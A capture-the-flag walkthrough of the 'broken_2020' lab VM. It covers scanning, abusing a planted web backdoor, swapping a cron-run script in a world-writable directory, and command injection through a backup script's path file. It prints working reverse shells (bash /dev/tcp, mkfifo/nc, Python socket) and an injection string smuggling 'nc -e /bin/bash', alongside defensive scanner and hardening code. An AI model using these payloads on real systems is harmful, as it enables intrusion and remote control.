broken_2020 target VM

Information gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.1.232

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:D3:A9:03 (Oracle VirtualBox virtual NIC)

Ports 22 and 80 are open.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.1.232

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 7e:f3:33:8c:be:0c:ed:d7:0e:c6:67:cc:73:bf:c0:ab (RSA)
| 256 ee:ed:74:02:0d:3f:7d:6d:45:aa:ff:f3:3a:d0:1a:d9 (ECDSA)
|_ 256 d1:18:a9:ef:7f:b6:c8:a9:30:52:c8:e6:b6:ec:64:80 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Coming Soon
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:D3:A9:03 (Oracle VirtualBox virtual NIC)

Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The operating system is Debian.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.168.1.232

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
| http-enum:
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
MAC Address: 08:00:27:D3:A9:03 (Oracle VirtualBox virtual NIC)

Directory brute-forcing

There is an /images/ directory; let's start with directory brute-forcing.

┌──(kali㉿kali)-[~/Documents/Broken_2020]
└─$ sudo dirsearch -u http://192.168.1.232

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

[10:23:58] 301 - 312B - /cms -> http://192.168.1.232/cms/
[10:23:58] 200 - 438B - /cms/
[10:24:02] 301 - 314B - /fonts -> http://192.168.1.232/fonts/
[10:24:04] 200 - 3KB - /images/
[10:24:04] 301 - 315B - /images -> http://192.168.1.232/images/
[10:24:04] 200 - 1KB - /index.html
[10:24:15] 403 - 278B - /server-status/
[10:24:15] 403 - 278B - /server-status

The default page just says a new CMS is being prepared, and there is nothing hidden in the page source.

Entering the cms directory shows an install page; clicking install redirects to http://192.168.1.232/cms/?install=off

This seems to be the first flag, but the install page can never be reached again afterwards.

I originally wanted to try a bigger wordlist, but once the request rate goes up the target stops responding properly, so I gave up on that for now.

Next I examined the images to see whether they hid anything; font.jpg might carry steghide data, but stegseek could not crack a passphrase.

I was stuck here for a while, mainly trying to decide whether the images hid any information; then I tried brute-forcing the cms directory.

┌──(kali㉿kali)-[~/Documents/Broken_2020]
└─$ sudo dirsearch -u 192.168.1.232/cms/

[22:40:32] 301 - 315B - /cms/cc -> http://192.168.1.232/cms/cc/
[22:40:38] 200 - 67B - /cms/index.html

Reverse shell through the website backdoor

Found a hidden directory cc; looking inside, it appears to be a backdoor someone left behind.

First, try listening with nc.

┌──(kali㉿kali)-[~/Documents/Broken_2020]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.232] 41466
GET /39b14733d3eb56a24f928abf52e115b4.sh HTTP/1.0
Host: 192.168.1.101:443
Connection: close

It is requesting a file named 39b14733d3eb56a24f928abf52e115b4.sh

We create a file of the same name containing a reverse shell, then serve it with python's built-in web server.

┌──(kali㉿kali)-[~/Documents/Broken_2020]
└─$ echo '/bin/bash -i >& /dev/tcp/192.168.1.101/443 0>&1' > 39b14733d3eb56a24f928abf52e115b4.sh

┌──(kali㉿kali)-[~/Documents/Broken_2020]
└─$ python -m http.server 8088

Start the listener first, then visit the following link to get the reverse shell: 192.168.1.232/cms/cc/?ip=192.168.1.101&port=8088

┌──(kali㉿kali)-[~/Documents/Broken_2020]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.232] 41480
bash: cannot set terminal process group (535): Inappropriate ioctl for device
bash: no job control in this shell
www-data@broken:/var/www/html/cms/cc$ whoami
whoami
www-data
www-data@broken:/var/www/html/cms/cc$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@broken:/var/www/html/cms/cc$ uname -a
uname -a
Linux broken 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
www-data@broken:/var/www/html$ which python
which python
/usr/bin/python
www-data@broken:/var/www/html$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
www-data@broken:/var/www/html$ sudo -l
sudo -l
[sudo] password for www-data:

Moving to the user account

Reverse shell obtained; check the permissions on the sensitive files.

www-data@broken:/var/www/html$ ls -liah /etc/passwd /etc/shadow   
ls -liah /etc/passwd /etc/shadow
269342 -rw-r--r-- 1 root root 1.6K Mar 24 2020 /etc/passwd
269646 -rw-r----- 1 root shadow 1.1K Mar 26 2020 /etc/shadow

Look at the web directory.

www-data@broken:/var/www/html/cms/cc$ ls -liha
ls -liha
total 28K
7030 drwxr-xr-x 2 www-data www-data 4.0K Oct 16 04:48 .
437 drwxr-xr-x 3 www-data www-data 4.0K Oct 15 16:37 ..
6671 -rw-r--r-- 1 www-data www-data 32 Oct 15 16:37 e425ef56a6ca4a3101e775d5019fb237.txt
39 -rw-r--r-- 1 www-data www-data 164 Mar 24 2020 fe8b7cfd24a4ad396054c8cd2f44d296.py
7384 -rw-r--r-- 1 www-data www-data 992 Mar 24 2020 index.php
8655 -rw-r--r-- 1 www-data www-data 54 Oct 16 04:51 log.txt
8654 -rw-r--r-- 1 www-data www-data 82 Oct 16 04:51 shell.sh

We must have come in through the shell.sh backdoor; take a look at the python file.

www-data@broken:/var/www/html/cms/cc$ cat fe8b7cfd24a4ad396054c8cd2f44d296.py
cat fe8b7cfd24a4ad396054c8cd2f44d296.py
import requests
import os

file = open("e425ef56a6ca4a3101e775d5019fb237.txt", "r")
script=file.read()
file.close()


ip="test"
url="http://"+ip+"/"+script+".sh"

The python file reads the contents of the txt file.

www-data@broken:/var/www/html/cms/cc$ cat e425ef56a6ca4a3101e775d5019fb237.txt
<ml/cms/cc$ cat e425ef56a6ca4a3101e775d5019fb237.txt
39b14733d3eb56a24f928abf52e115b4
www-data@broken:/var/www/html/cms/cc$ cat shell.sh
cat shell.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.101 443 >/tmp/f

The txt file stores the name of the file to request; the script requests it, writes it to shell.sh and runs it. The logic is clear now, but it does not help with privilege escalation, so let's look at the user's home directory.
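From a defender's side, the interesting part of this backdoor is its shape: a file in the web root that fetches content from a caller-supplied host and then executes it. The following scanner is an added example for this writeup, not code from the box or from any project; it walks a web root and flags scripts that combine a network fetch, or a raw request parameter, with a command-execution call. The indicator lists are heuristics chosen for this example, and the sample files it scans are constructed to mimic the dropper seen above.

```python
import os
import re
import tempfile

# Heuristic indicator groups (constructed for this example, not exhaustive).
FETCH = [r"requests\.(get|post)\(", r"\burllib\b", r"urlopen\(",
         r"file_get_contents\(\s*['\"]https?://", r"curl_exec\("]
EXEC = [r"\bos\.system\(", r"\bsubprocess\.", r"\bos\.popen\(", r"\bshell_exec\(",
        r"\bpassthru\(", r"(?<![\w$])system\(", r"\bexec\("]
USER_INPUT = [r"\$_(GET|POST|REQUEST)\b", r"request\.(args|form)\b"]


def indicators(text, patterns):
    """Return the patterns from `patterns` that occur in `text`."""
    return [p for p in patterns if re.search(p, text)]


def scan_file(path):
    """Return the reasons a file looks like a download-and-execute backdoor
    or a parameter-to-shell bridge; an empty list means nothing matched."""
    try:
        with open(path, "r", errors="replace") as f:
            text = f.read()
    except OSError:
        return []
    fetch = indicators(text, FETCH)
    execs = indicators(text, EXEC)
    user_input = indicators(text, USER_INPUT)
    reasons = []
    if fetch and execs:
        reasons.append("fetches remote content and executes commands")
    if user_input and execs:
        reasons.append("passes request parameters to command execution")
    return reasons


def scan_webroot(root, suffixes=(".py", ".php", ".sh")):
    """Map each suspicious script under `root` (relative path) to its reasons."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(suffixes):
                full = os.path.join(dirpath, name)
                reasons = scan_file(full)
                if reasons:
                    hits[os.path.relpath(full, root)] = reasons
    return hits


def build_fixture():
    """Constructed web root: a dropper modelled on the one in /cms/cc, a PHP
    front end that hands a GET parameter to the shell, and a benign script."""
    root = tempfile.mkdtemp(prefix="webroot_")
    cc = os.path.join(root, "cms", "cc")
    os.makedirs(cc)
    with open(os.path.join(cc, "dropper.py"), "w") as f:
        f.write('import requests\nimport os\n'
                'script = open("name.txt").read().strip()\n'
                'r = requests.get("http://" + ip + "/" + script + ".sh")\n'
                'open("shell.sh", "w").write(r.text)\n'
                'os.system("bash shell.sh")\n')
    with open(os.path.join(cc, "index.php"), "w") as f:
        f.write('<?php $ip = $_GET["ip"]; shell_exec("python dropper.py " . $ip); ?>\n')
    with open(os.path.join(root, "cms", "healthcheck.py"), "w") as f:
        f.write('import requests\nprint(requests.get("http://localhost/").status_code)\n')
    return root


if __name__ == "__main__":
    for rel, reasons in sorted(scan_webroot(build_fixture()).items()):
        print(rel, "->", "; ".join(reasons))
```

Run it against a real web root with `scan_webroot("/var/www/html")`; a hit is a file to read by hand, not proof of compromise, since legitimate deployment scripts also fetch and run things. Pairing this with a file-integrity baseline of the web root (new or changed .php/.py files) catches droppers that use APIs the indicator lists do not know about.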

www-data@broken:/home/alice$ ls -liha
ls -liha
total 48K
31 drwxr-xr-x 5 alice alice 4.0K Mar 26 2020 .
193 drwxr-xr-x 3 root root 4.0K Mar 24 2020 ..
6538 lrwxrwxrwx 1 alice alice 9 Mar 24 2020 .bash_history -> /dev/null
67 -rw-r--r-x 1 alice alice 220 Mar 24 2020 .bash_logout
7046 -rw-r--r-- 1 alice alice 570 Jan 31 2010 .bashrc
6523 drwxr-xr-x 3 alice alice 4.0K Mar 24 2020 .cache
6842 drwxr-xr-x 3 alice alice 4.0K Mar 24 2020 .local
46 -rw-r--r-- 1 alice alice 148 Aug 17 2015 .profile
54 -rw-r--r-- 1 alice alice 66 Mar 25 2020 .selected_editor
6982 -rw-r--r-- 1 alice alice 173 Mar 24 2020 .wget-hsts
7131 -rw-r--r-- 1 alice alice 29 Mar 25 2020 flag.txt
6841 -rw-r--r-- 1 alice alice 141 Mar 25 2020 note.txt
6859 drwxrwxrwx 2 alice alice 4.0K Mar 26 2020 script

Grab the flag and the note first.

www-data@broken:/home/alice$ cat note.txt
cat note.txt
Alice,

Please do not install TrustMeCMS, I need check the source before

PS: I created a script to clear apache log during the tests

root
www-data@broken:/home/alice$ cat flag.txt
cat flag.txt
{FLAG2:**Robing the rober**}

root wrote a scheduled script that clears the Apache logs; there is also a script directory to look at.

www-data@broken:/home/alice/script$ ls -liha
ls -liha
total 16K
6859 drwxrwxrwx 2 alice alice 4.0K Mar 26 2020 .
31 drwxr-xr-x 5 alice alice 4.0K Mar 26 2020 ..
6862 -rw-r--r-x 1 alice alice 48 Oct 16 04:57 clear.log
6861 -rwxr--r-- 1 alice alice 585 Mar 25 2020 log.py
www-data@broken:/home/alice/script$ cat log.py
cat log.py
#!/usr/bin/python2.7
import requests
import os
import datetime

"""
#Juste in case I want stop this script remotly

r = requests.get("https://pastebin.com/raw/9vzu2CA5")

cmd=str(r.text)
check ="stopit"
if check == cmd :
    os.system('cp /home/alice/script/log.py /home/alice/script/log.bak')

"""


path="/var/log/apache2"
dir = os.listdir(path)
date = str(datetime.datetime.now())
for logfile in dir :
    clear = open(path+"/"+logfile, "w")
    clear.truncate(0)
    clear.close()
logfile = open("/home/alice/script/clear.log","w")
logfile.write("last clear apache log "+date)
logfile.close()

The log-clearing script is log.py, and clear.log only records its last run; we have no write permission on the script itself, even though the directory is 777.

Continuing enumeration, backup.py and a back directory were found under the filesystem root.

www-data@broken:/back$ ls ..
ls ..
back etc lib media run usr
backup.py flag.txt lib32 mnt sbin var
bin home lib64 opt srv vmlinuz
boot initrd.img libx32 proc sys vmlinuz.old
dev initrd.img.old lost+found root tmp
www-data@broken:/$ cat backup.py
cat backup.py
import os
import datetime
size = os.path.getsize("/home/alice/backup/path.txt")

if size > 3 :

    file = open("/home/alice/backup/path.txt", "r")
    path = file.read().strip()
    file.close()
    cmd = "rsync -a "+path+" /home/alice/backup --exclude back --exclude backup.py&& chown -R www-data:alice /home/alice/backup && chmod -R 777 /home/alice/backup"
    os.system(cmd)
date = str(datetime.datetime.now())
log = open("/home/alice/backup/logbot.log", "w")
log.write("last check : "+date)
log.close()

backup.py syncs whatever path is named in /home/alice/backup/path.txt into the backup directory, then chowns it to www-data:alice and chmods it 777, so the copy is readable by ordinary users.

www-data@broken:/back$ ls -liha
ls -liha
total 36K
152663 drwxr-xr-x 3 root root 4.0K Mar 25 2020 .
2 drwxr-xr-x 19 root root 4.0K Mar 25 2020 ..
152665 drwxr-xr-x 2 root root 4.0K Mar 25 2020 backup
152673 -rwxr-xr-x 1 root root 493 Mar 25 2020 backup.py
152670 -rw-r--r-- 1 root root 114 Mar 25 2020 check.py
152671 -rwxr-xr-x 1 root root 274 Mar 25 2020 hack.sh
152674 -rwxr-xr-x 1 root root 132 Mar 25 2020 load.sh
152664 -rw------- 1 root root 1.2K Mar 25 2020 post
152672 -rw------- 1 root root 1.2K Mar 25 2020 root

The contents of each file are as follows.

The key point is still the backup directory under alice's home, but so far there is no way to switch user or escalate privileges.

I overlooked one thing here and was stuck for a long time: the file is readable but not writable, yet the directory is 777. That means we can rename the file, because a file's name is governed by the directory's permissions, not by the file's own.

www-data@broken:/home/alice/script$ mv log.py log.py.bak
mv log.py log.py.bak
www-data@broken:/home/alice/script$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.101",444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' > log.py
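The permission mistake that made the rename possible is easy to audit for. The following script is an added example written for this writeup, not code from the box: it walks a tree, reports every .py or .sh file whose parent directory is world-writable and not sticky (the file's own mode does not matter, since renaming and recreating an entry needs only write permission on the directory), and then strips group/other write from those directories. The fixture it builds is constructed to mirror the layout above: a 777 script directory holding a 744 log.py.

```python
import os
import stat
import tempfile

SCRIPT_SUFFIXES = (".py", ".sh")


def dir_is_open_for_rename(st):
    """True for a directory where any user may unlink or rename entries:
    world-writable and without the sticky bit. Group-writable directories
    are the same problem for members of that group; widen the mask to audit them."""
    return bool(st.st_mode & stat.S_IWOTH) and not (st.st_mode & stat.S_ISVTX)


def find_replaceable_scripts(root):
    """Return (script_path, dir_mode, file_mode) for every script under `root`
    that any local user could swap out by renaming it and creating a new file
    under the same name."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        try:
            dst = os.stat(dirpath)
        except OSError:
            continue
        if not dir_is_open_for_rename(dst):
            continue
        for name in filenames:
            if name.endswith(SCRIPT_SUFFIXES):
                path = os.path.join(dirpath, name)
                fst = os.lstat(path)
                findings.append((path,
                                 oct(stat.S_IMODE(dst.st_mode)),
                                 oct(stat.S_IMODE(fst.st_mode))))
    return findings


def harden(root):
    """Remove group/other write from every directory flagged by the audit.
    Returns the number of directories changed."""
    changed = set()
    for path, _, _ in find_replaceable_scripts(root):
        d = os.path.dirname(path)
        if d not in changed:
            mode = stat.S_IMODE(os.stat(d).st_mode)
            os.chmod(d, mode & ~(stat.S_IWGRP | stat.S_IWOTH))
            changed.add(d)
    return len(changed)


def build_fixture():
    """Constructed layout: alice/script is 777 and holds a 744 log.py,
    next to a 755 directory that must not be reported."""
    base = tempfile.mkdtemp(prefix="audit_")
    script_dir = os.path.join(base, "alice", "script")
    os.makedirs(script_dir)
    log_py = os.path.join(script_dir, "log.py")
    with open(log_py, "w") as f:
        f.write("#!/usr/bin/python2.7\n")
    os.chmod(log_py, 0o744)
    os.chmod(script_dir, 0o777)
    safe_dir = os.path.join(base, "alice", "safe")
    os.makedirs(safe_dir)
    with open(os.path.join(safe_dir, "ok.py"), "w") as f:
        f.write("pass\n")
    os.chmod(safe_dir, 0o755)
    return base


if __name__ == "__main__":
    base = build_fixture()
    for path, dmode, fmode in find_replaceable_scripts(base):
        print("replaceable script %s (dir %s, file %s)" % (path, dmode, fmode))
    print("hardened %d directories" % harden(base))
```

Pointing `find_replaceable_scripts` at /home or /opt on a real host gives the list of scripts that a scheduled job would execute after any local user replaced them; a scheduled script is safest in a root-owned, non-writable directory such as /usr/local/sbin rather than a user's home.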

Privilege escalation

Start the listener in advance and wait for the reverse shell.

┌──(kali㉿kali)-[~/Documents/Broken_2020]
└─$ sudo nc -lvnp 444
[sudo] password for kali:
listening on [any] 444 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.232] 58756
alice@broken:/root$ whoami
whoami
alice
alice@broken:/root$ id
id
uid=1000(alice) gid=1000(alice) groupes=1000(alice),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
alice@broken:/root$ cd ~
cd ~
alice@broken:~$ ls -liah
ls -liah
total 52K
31 drwxr-xr-x 6 alice alice 4,0K oct. 16 10:25 .
193 drwxr-xr-x 3 root root 4,0K mars 24 2020 ..
7147 drwx------ 2 alice alice 4,0K mars 26 2020 backup
6538 lrwxrwxrwx 1 alice alice 9 mars 24 2020 .bash_history -> /dev/null
67 -rw-r--r-x 1 alice alice 220 mars 24 2020 .bash_logout
7046 -rw-r--r-- 1 alice alice 570 janv. 31 2010 .bashrc
6523 drwxr-xr-x 3 alice alice 4,0K mars 24 2020 .cache
7131 -rw-r--r-- 1 alice alice 29 mars 25 2020 flag.txt
6842 drwxr-xr-x 3 alice alice 4,0K mars 24 2020 .local
6841 -rw-r--r-- 1 alice alice 141 mars 25 2020 note.txt
46 -rw-r--r-- 1 alice alice 148 août 17 2015 .profile
6859 drwxrwxrwx 2 alice alice 4,0K oct. 16 10:24 script
54 -rw-r--r-- 1 alice alice 66 mars 25 2020 .selected_editor
6982 -rw-r--r-- 1 alice alice 173 mars 24 2020 .wget-hsts

As alice there is an extra backup directory in the home directory; go into it.

alice@broken:~/backup$ ls -liah
ls -liah
total 20K
7147 drwx------ 2 alice alice 4,0K mars 26 2020 .
31 drwxr-xr-x 6 alice alice 4,0K oct. 16 10:25 ..
9698 -rw-r--r-- 1 alice alice 27 mars 26 2020 flag.txt
9697 -rw-r--r-- 1 alice alice 150 oct. 16 10:28 logbot.log
9696 -rw-r--r-- 1 alice alice 129 mars 26 2020 note.txt
9695 -rw-r--r-- 1 alice alice 0 mars 26 2020 path.txt

Next I tried writing a file name directly, but logbot.log said it must be a directory. We had already seen the contents of the scheduled backup.py, where the content of path.txt is fully controllable and is executed without any filtering, so I considered whether a reverse shell with elevated privileges could be obtained here.

alice@broken:~/backup$ echo '/etc/shadow /home/alice/backup &&nc 192.168.1.101 445 -e /bin/bash &&rsync -a' >path.txt

alice@broken:~/backup$ cat logbot.log
cat logbot.log
[INFO] 10:26:01 16/10/2023 : no path in path.txt
[SECURITY] 10:39:01 16/10/2023 : [&] may be an attack attempt. To avoid this the script was interrupted

It even checks for &, which I did not expect. To get the shadow file the whole etc directory would have to be backed up, which does not seem feasible.

I was stuck for a long time on how to use this controllable input to escalate privileges. Try pulling the contents of /root first.
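The root cause in backup.py, discussed above at the script listing and again at the logbot check, is that a user-controlled string is spliced into a shell command for os.system(); the box's defence is a blacklist of one shell character, which is brittle by nature. The following is an added example written for this writeup, not the box's code: it shows the vulnerable string-building pattern for contrast beside a hardened version that canonicalises the requested path, checks it against an allowlist of roots, and runs rsync as an argument list with no shell involved, so nothing in path.txt can ever become a second command. The fixture paths and allowed root are constructed for the example.

```python
import os
import subprocess
import tempfile


def build_command_vulnerable(path):
    """The pattern backup.py uses on the box: untrusted text is spliced into
    one shell string. Shown for contrast only; this example never runs it."""
    return ("rsync -a " + path + " /home/alice/backup --exclude back --exclude backup.py"
            " && chown -R www-data:alice /home/alice/backup && chmod -R 777 /home/alice/backup")


def validate_source(path, allowed_roots):
    """Return the canonical form of `path` if it is an existing directory under
    one of `allowed_roots`; otherwise raise ValueError. realpath() resolves
    '..' and symlinks before the allowlist comparison, so traversal cannot
    slip past it, and requiring an existing directory rejects any string
    that merely starts with an allowed prefix."""
    if not path or not os.path.isabs(path):
        raise ValueError("source must be a single absolute path")
    real = os.path.realpath(path)
    for root in allowed_roots:
        root_real = os.path.realpath(root)
        if real == root_real or real.startswith(root_real.rstrip(os.sep) + os.sep):
            if not os.path.isdir(real):
                raise ValueError("source must be an existing directory")
            return real
    raise ValueError("source is outside the allowed roots")


def build_rsync_argv(path, dest, allowed_roots):
    """Argument list for rsync. Because the path is a single argv element,
    spaces, '&', ';' or quotes in it are passed to rsync verbatim as part of
    a file name, never interpreted by a shell."""
    src = validate_source(path, allowed_roots)
    return ["rsync", "-a", "--exclude", "back", "--exclude", "backup.py", src, dest]


def run_backup(path, dest, allowed_roots):
    """Hardened replacement for os.system(cmd): no shell, fixed argv."""
    subprocess.run(build_rsync_argv(path, dest, allowed_roots), check=True)


def rejects(path, allowed_roots):
    """Helper for checking that validation refuses a path."""
    try:
        validate_source(path, allowed_roots)
    except ValueError:
        return True
    return False


def make_fixture():
    """Constructed allowed root with one site directory inside it."""
    base = tempfile.mkdtemp(prefix="bk_")
    site = os.path.join(base, "site")
    os.makedirs(site)
    return os.path.realpath(base), os.path.realpath(site)


if __name__ == "__main__":
    base, site = make_fixture()
    print("vulnerable:", build_command_vulnerable(site + " && id"))
    print("hardened argv:", build_rsync_argv(site, "/tmp/dest", [base]))
    print("injection attempt rejected:", rejects(site + " && id", [base]))
```

The chown/chmod -R 777 step of the original script is deliberately absent: copying root-owned directories and then making them world-readable is what turned /root into readable loot, so a backup job should write to a directory only root (or a dedicated backup user) can read.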

alice@broken:~/backup$ echo "/root" >path.txt
echo "/root" >path.txt
alice@broken:~/backup$ cd root
cd root
alice@broken:~/backup/root$ ls -liah
ls -liah
total 40K
7172 drwxrwxrwx 4 www-data alice 4,0K oct. 16 10:25 .
7147 drwxrwxrwx 3 www-data alice 4,0K oct. 16 10:46 ..
8708 lrwxrwxrwx 1 www-data alice 9 mars 24 2020 .bash_history -> /dev/null
8845 -rwxrwxrwx 1 www-data alice 570 janv. 31 2010 .bashrc
8728 drwxrwxrwx 3 www-data alice 4,0K mars 24 2020 .cache
8852 -rwxrwxrwx 1 www-data alice 508 mars 26 2020 flag.txt
8730 drwxrwxrwx 3 www-data alice 4,0K mars 24 2020 .local
8854 -rwxrwxrwx 1 www-data alice 0 mars 26 2020 log.txt
8846 -rwxrwxrwx 1 www-data alice 148 août 17 2015 .profile
8848 -rwxrwxrwx 1 www-data alice 66 mars 25 2020 .selected_editor
8856 -rwxrwxrwx 1 www-data alice 105 mars 26 2020 test.py
8850 -rwxrwxrwx 1 www-data alice 173 mars 24 2020 .wget-hsts
alice@broken:~/backup/root$ cat flag.txt
cat flag.txt
Congratulation for the root flag !

_________
/ ======= \
/ __________\
| ___________ |
| | -root- | |
| | | |
| |_________| |_____________________________________________________________________
\=____________/ enjoyed this VM ? )
/ """"""""""" \ I love bitcoin /
/ ::::::::::::: \ 1Ba6vFEamUenzrXr4scGQ8QLya7t7zYZ1S =D-'
(_________________)

But still no privilege escalation. After reading two other blog posts, it seems that grabbing the flag here is the intended end. Hmm.

Summary

My understanding of filesystem permissions is still weak; I fixated on the read-only file, which made getting the reverse shell far harder than it needed to be.


broken_2020 target VM
https://i3eg1nner.github.io/2023/10/18e513304239.html
Author
I3eg1nner
Published on
October 15, 2023
License